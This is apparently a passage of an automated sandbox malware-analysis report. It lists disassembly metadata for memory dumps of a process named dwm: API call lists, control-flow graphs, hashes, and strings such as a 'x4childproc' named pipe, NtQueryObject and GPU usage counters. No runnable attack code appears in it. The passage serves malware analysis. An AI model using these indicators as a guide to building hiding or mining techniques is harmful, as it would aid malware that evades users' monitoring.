                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE2617D2
                                                  • SleepEx.KERNEL32 ref: 000002BAAE261AEB
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.ADVAPI32 ref: 000002BAAE2617ED
                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE26180D
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.ADVAPI32 ref: 000002BAAE261828
                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE261848
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.ADVAPI32 ref: 000002BAAE261863
                                                    • Part of subcall function 000002BAAE261630: RegOpenKeyExW.KERNELBASE ref: 000002BAAE261883
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.ADVAPI32 ref: 000002BAAE26189E
                                                    • Part of subcall function 000002BAAE261630: RegCloseKey.KERNELBASE ref: 000002BAAE2618A8
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 64fb92cc953f313ae368503f7b994b04d0db7b05d41c96cf66c0a3f5624dce5c
                                                  • Instruction ID: 470b89c818ced6a52223e5ee6964a7b97a6b09a8662a572c4a5a54a81a4c8d7e
                                                  • Opcode Fuzzy Hash: 64fb92cc953f313ae368503f7b994b04d0db7b05d41c96cf66c0a3f5624dce5c
                                                  • Instruction Fuzzy Hash: B4311E6161064182FF549B22C97836DF3B4EBACBC0F2452318E8E876D5EF20E858C372

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 410 2baae262bc8-2baae262c41 412 2baae262f5c-2baae262f7f 410->412 413 2baae262c47-2baae262c4d 410->413 413->412 414 2baae262c53-2baae262c56 413->414 414->412 415 2baae262c5c-2baae262c5f 414->415 415->412 416 2baae262c65-2baae262c75 GetModuleHandleA 415->416 417 2baae262c89 416->417 418 2baae262c77-2baae262c87 GetProcAddress 416->418 419 2baae262c8c-2baae262caa 417->419 418->419 419->412 421 2baae262cb0-2baae262ccf StrCmpNIW 419->421 421->412 422 2baae262cd5-2baae262cd9 421->422 422->412 423 2baae262cdf-2baae262ce9 422->423 423->412 424 2baae262cef-2baae262cf6 423->424 424->412 425 2baae262cfc-2baae262d0f 424->425 426 2baae262d11-2baae262d1d 425->426 427 2baae262d1f 425->427 428 2baae262d22-2baae262d26 426->428 427->428 429 2baae262d28-2baae262d34 428->429 430 2baae262d36 428->430 431 2baae262d39-2baae262d43 429->431 430->431 432 2baae262e29-2baae262e2d 431->432 433 2baae262d49-2baae262d4c 431->433 434 2baae262f4e-2baae262f56 432->434 435 2baae262e33-2baae262e36 432->435 436 2baae262d5e-2baae262d68 433->436 437 2baae262d4e-2baae262d5b call 2baae26193c 433->437 434->412 434->425 440 2baae262e38-2baae262e44 call 2baae26193c 435->440 441 2baae262e47-2baae262e51 435->441 438 2baae262d9c-2baae262da6 436->438 439 2baae262d6a-2baae262d77 436->439 437->436 445 2baae262da8-2baae262db5 438->445 446 2baae262dd6-2baae262dd9 438->446 439->438 444 2baae262d79-2baae262d86 439->444 440->441 448 2baae262e81-2baae262e84 441->448 449 2baae262e53-2baae262e60 441->449 452 2baae262d89-2baae262d8f 444->452 445->446 453 2baae262db7-2baae262dc4 445->453 455 2baae262ddb-2baae262de5 call 2baae261bd0 446->455 456 2baae262de7-2baae262df4 lstrlenW 446->456 450 2baae262e91-2baae262e9e lstrlenW 448->450 451 2baae262e86-2baae262e8f call 2baae261bd0 448->451 449->448 457 2baae262e62-2baae262e6f 449->457 463 2baae262ea0-2baae262eaf call 2baae261c08 450->463 464 2baae262eb1-2baae262ebb call 2baae263c40 450->464 451->450 469 2baae262ec6-2baae262ed1 451->469 461 2baae262e1f-2baae262e24 452->461 462 2baae262d95-2baae262d9a 452->462 465 2baae262dc7-2baae262dcd 453->465 455->456 455->461 458 2baae262df6-2baae262e05 call 2baae261c08 456->458 459 2baae262e07-2baae262e19 call 2baae263c40 456->459 467 2baae262e72-2baae262e78 457->467 458->459 458->461 459->461 473 2baae262ebe-2baae262ec0 459->473 461->473 462->438 462->452 463->464 463->469 464->473 465->461 476 2baae262dcf-2baae262dd4 465->476 468 2baae262e7a-2baae262e7f 467->468 467->469 468->448 468->467 482 2baae262f48-2baae262f4c 469->482 483 2baae262ed3-2baae262ed7 469->483 473->434 473->469 476->446 476->465 482->434 484 2baae262edf-2baae262ef9 call 2baae275470 483->484 485 2baae262ed9-2baae262edd 483->485 486 2baae262efc-2baae262eff 484->486 485->484 485->486 489 2baae262f01-2baae262f1f call 2baae275470 486->489 490 2baae262f22-2baae262f25 486->490 489->490 490->482 492 2baae262f27-2baae262f45 call 2baae275470 490->492 492->482
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction ID: 0390046f8c3905493f9837746de5fb985ca8fcdb15733c1cfd2e250ea277c6d0
                                                  • Opcode Fuzzy Hash: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction Fuzzy Hash: CCB1B57321069182EF68CF29D8287A9F3B4F769B84F645226EE8953794DF35CC48C361
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction ID: ff249672e0258b7f6a81181278dff7e914db3791122784ab39d15029b62fd782
                                                  • Opcode Fuzzy Hash: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction Fuzzy Hash: 0E313BB2304B808AEB649F60E8643EE7374F798744F54452ADA8E47B98DF78C64CC721
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction ID: 61d67e88d47b684841b9bb81a145ed80e9c3a7773ec11f34914b2ec5e320e5c9
                                                  • Opcode Fuzzy Hash: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction Fuzzy Hash: 2F316D32214B8086EB60DF25E8543AE73B0F799754F640226EADD43BA8DF38C159CB11

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction ID: e05c063aa875afc42eb26d436efe3f2460179a1b6811c18f8158e3426a2836ad
                                                  • Opcode Fuzzy Hash: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction Fuzzy Hash: EB512872604B8487EB54CF62E46C39AB7B1F788B99F284124DA8A47B68DF3CD059C711

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 363 2baae26d778-2baae26d79a GetLastError 364 2baae26d79c-2baae26d7a7 FlsGetValue 363->364 365 2baae26d7b9-2baae26d7c4 FlsSetValue 363->365 366 2baae26d7a9-2baae26d7b1 364->366 367 2baae26d7b3 364->367 368 2baae26d7cb-2baae26d7d0 365->368 369 2baae26d7c6-2baae26d7c9 365->369 370 2baae26d825-2baae26d830 SetLastError 366->370 367->365 371 2baae26d7d5 call 2baae26e01c 368->371 369->370 373 2baae26d845-2baae26d85b call 2baae26d098 370->373 374 2baae26d832-2baae26d844 370->374 372 2baae26d7da-2baae26d7e6 371->372 376 2baae26d7f8-2baae26d802 FlsSetValue 372->376 377 2baae26d7e8-2baae26d7ef FlsSetValue 372->377 385 2baae26d85d-2baae26d868 FlsGetValue 373->385 386 2baae26d878-2baae26d883 FlsSetValue 373->386 380 2baae26d816-2baae26d820 call 2baae26d4e4 call 2baae26e094 376->380 381 2baae26d804-2baae26d814 FlsSetValue 376->381 379 2baae26d7f1-2baae26d7f6 call 2baae26e094 377->379 379->369 380->370 381->379 389 2baae26d86a-2baae26d86e 385->389 390 2baae26d872 385->390 391 2baae26d8e8-2baae26d8ef call 2baae26d098 386->391 392 2baae26d885-2baae26d88a 386->392 389->391 394 2baae26d870 389->394 390->386 396 2baae26d88f call 2baae26e01c 392->396 397 2baae26d8df-2baae26d8e7 394->397 399 2baae26d894-2baae26d8a0 396->399 400 2baae26d8b2-2baae26d8bc FlsSetValue 399->400 401 2baae26d8a2-2baae26d8a9 FlsSetValue 399->401 402 2baae26d8d0-2baae26d8da call 2baae26d4e4 call 2baae26e094 400->402 403 2baae26d8be-2baae26d8ce FlsSetValue 400->403 404 2baae26d8ab-2baae26d8b0 call 2baae26e094 401->404 402->397 403->404 404->391
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D787
                                                  • FlsGetValue.KERNEL32(?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D79C
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D7BD
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D7EA
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D7FB
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D80C
                                                  • SetLastError.KERNEL32(?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D827
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D85D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,000002BAAE26F61C,?,?,?,?,000002BAAE26C8EF,?,?,?,?,?,000002BAAE267EA0), ref: 000002BAAE26D87C
                                                    • Part of subcall function 000002BAAE26E01C: HeapAlloc.KERNEL32(?,?,00000000,000002BAAE26D952,?,?,?,000002BAAE26E005,?,?,?,?,000002BAAE26E0C8), ref: 000002BAAE26E071
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D8A4
                                                    • Part of subcall function 000002BAAE26E094: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002BAAE2663FA), ref: 000002BAAE26E0AA
                                                    • Part of subcall function 000002BAAE26E094: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002BAAE2663FA), ref: 000002BAAE26E0B4
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D8B5
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAE2713BB,?,?,?,000002BAAE270DAC,?,?,?,000002BAAE26D19F), ref: 000002BAAE26D8C6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                  • String ID:
                                                  • API String ID: 570795689-0
                                                  • Opcode ID: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction ID: 16d1909e5c28eadf065980661acd4f1f9444892cc97942e8a474bbeb1ab651b1
                                                  • Opcode Fuzzy Hash: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction Fuzzy Hash: 1441531020124841FD697735557D379B3B2EBBD7B0F341B2469BA0A6D6DF68944EC223

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction ID: 40817cae6b119ad75cf1a88581634478b2f2eef22579577da673a3c85b1f9c42
                                                  • Opcode Fuzzy Hash: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction Fuzzy Hash: 1731B162604A9197FF20CF22A868359F3B0F79CB95F2802259E8943A24DF78C05DC751

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction ID: 6d31272c772f0be7ac7ccb30797967e8c6054384ae81892fcf17cb2b988384f7
                                                  • Opcode Fuzzy Hash: 36637897c93c8ede7bb1ce85cbdc6512425acb20b5d3eb7c994f69eec6c0aa17
                                                  • Instruction Fuzzy Hash: 93316F61710B81C6EF20DF66A8A875AB3B0F79CF95F2841259E8A43724DF38C459C711
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction ID: 66753e92213e685b9a484dc7020989556bbd9ff526257d642e17938186cbf334
                                                  • Opcode Fuzzy Hash: 31653785dc960ea28704927179ae8f8438071b28d477621c124d78babdf68865
                                                  • Instruction Fuzzy Hash: 1DD1B172600B8086EF609F65D8A839DB7B0F769788F200316EFC957B96DB34C499C752
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeLibraryProc
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3013587201-537541572
                                                  • Opcode ID: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction ID: 7a7512e84c77af88d83c695805c69765960b513dc807ab07f5965d32ea874f56
                                                  • Opcode Fuzzy Hash: 8fab418be913b1dd9c03b8cb16d38d32b5f0f709c7bacb4f0a2a12f1537edad2
                                                  • Instruction Fuzzy Hash: 2941E161321A0082FE25CF169C2C795B3B1F76DBA0F6987259D8947785EB38C40DC322
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction ID: 84bf4eb6cf0821c4d099a73c4bcbd6e35ca8a2dc1364a4638f11f9e95b9100a5
                                                  • Opcode Fuzzy Hash: 5adff6ada05b66aa146935fce20443cd5743e8ff68fb0e8e1f1600fcf5731c5e
                                                  • Instruction Fuzzy Hash: 90418273214B80C6EB60CF61E45839EB7B1F388B99F148229DB8907B58DF38D849CB11
                                                  APIs
                                                  • FlsGetValue.KERNEL32(?,?,?,000002BAAE26D12E,?,?,?,?,?,?,?,?,000002BAAE26D8ED,?,?,00000001), ref: 000002BAAE26D9D7
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE26D12E,?,?,?,?,?,?,?,?,000002BAAE26D8ED,?,?,00000001), ref: 000002BAAE26D9F6
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE26D12E,?,?,?,?,?,?,?,?,000002BAAE26D8ED,?,?,00000001), ref: 000002BAAE26DA1E
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE26D12E,?,?,?,?,?,?,?,?,000002BAAE26D8ED,?,?,00000001), ref: 000002BAAE26DA2F
                                                  • FlsSetValue.KERNEL32(?,?,?,000002BAAE26D12E,?,?,?,?,?,?,?,?,000002BAAE26D8ED,?,?,00000001), ref: 000002BAAE26DA40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction ID: 9b43f5fa68982a0d4043eca0f96376fdb374f5af94c4cc7a184452ed0978c9f0
                                                  • Opcode Fuzzy Hash: 6756a61c19cd3a2654bc82cc989f9db1f24638631997e6e01126e156054fbc07
                                                  • Instruction Fuzzy Hash: 62117F1020924441FE686B3565B9379B3A2EB7C7A0F385724A9B9067C6DF68D84AC223
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054714089.000002BAAE277000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054766355.000002BAAE282000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054816566.000002BAAE284000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.3054869035.000002BAAE28A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2baae260000_dwm.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\x4childproc
                                                  • API String ID: 166002920-1140171592
                                                  • Opcode ID: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction ID: ae98e97e281ae08827789d5ce40c70aafc13221933e274c13d9143c7c36d5426
                                                  • Opcode Fuzzy Hash: 0218981624b79cd85621b87b3d98e60b90bbe0fcc300a77231272d113fd18cb7
                                                  • Instruction Fuzzy Hash: 79115E72628B4083FB108B25F91875AB770F389BD5F604315EA9906BA8DF7CC148CB51
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.3054658479.000002BAAE261000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                                  • Associated: 00000009.00000002.3054607411.000002BAAE260000.00000002.00000001.00020000.00000000.sdmpDownload File
